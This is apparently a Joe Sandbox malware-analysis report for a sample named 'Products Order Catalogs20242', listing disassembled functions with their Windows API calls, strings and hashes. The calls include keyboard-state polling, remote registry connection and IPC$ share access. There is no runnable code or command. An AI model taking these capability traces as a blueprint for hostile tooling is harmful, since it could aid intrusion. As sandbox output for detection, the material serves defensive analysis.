                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                • API String ID: 3125838495-3381328864
                                                                                                • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CopyVariant$ErrorLast
                                                                                                • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                • API String ID: 2286883814-4206948668
                                                                                                • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                APIs
                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                • _wcscpy.LIBCMT ref: 00475F18
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                • API String ID: 3052893215-4176887700
                                                                                                • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                APIs
                                                                                                • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                  • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                • String ID: Version$\TypeLib$interface\
                                                                                                • API String ID: 656856066-939221531
                                                                                                • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                APIs
                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                • _printf.LIBCMT ref: 0045E7A9
                                                                                                • _printf.LIBCMT ref: 0045E7D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 3590180749-2354261254
                                                                                                • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                • API String ID: 3038501623-2263619337
                                                                                                • Opcode ID: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
                                                                                                • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                • Opcode Fuzzy Hash: 7e05bcd9e2404d5900448c0fd088cae6e51159eb800a8f0db5a010da26838fc3
                                                                                                • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                APIs
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • _memset.LIBCMT ref: 00458194
                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                • API String ID: 2255324689-22481851
                                                                                                • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                • String ID: ($interface$interface\
                                                                                                • API String ID: 2231185022-3327702407
                                                                                                • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                APIs
                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                • _wcscpy.LIBCMT ref: 004365F5
                                                                                                • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                • _strcat.LIBCMT ref: 0043662F
                                                                                                • _wcscpy.LIBCMT ref: 00436644
                                                                                                • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                • _wcscpy.LIBCMT ref: 00436666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                • String ID: 0.0.0.0
                                                                                                • API String ID: 2691793716-3771769585
                                                                                                • Opcode ID: 4b0b642d101985f70d6cdd6c7558d2647848e1b39832a20c11015ca7ea879481
                                                                                                • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                • Opcode Fuzzy Hash: 4b0b642d101985f70d6cdd6c7558d2647848e1b39832a20c11015ca7ea879481
                                                                                                • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                • __lock.LIBCMT ref: 00416B8A
                                                                                                • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                • __lock.LIBCMT ref: 00416BAB
                                                                                                • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                • API String ID: 1028249917-2843748187
                                                                                                • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CharNext
                                                                                                • String ID:
                                                                                                • API String ID: 1350042424-0
                                                                                                • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                • String ID:
                                                                                                • API String ID: 3096461208-0
                                                                                                • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 136442275-0
                                                                                                • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_wcslen
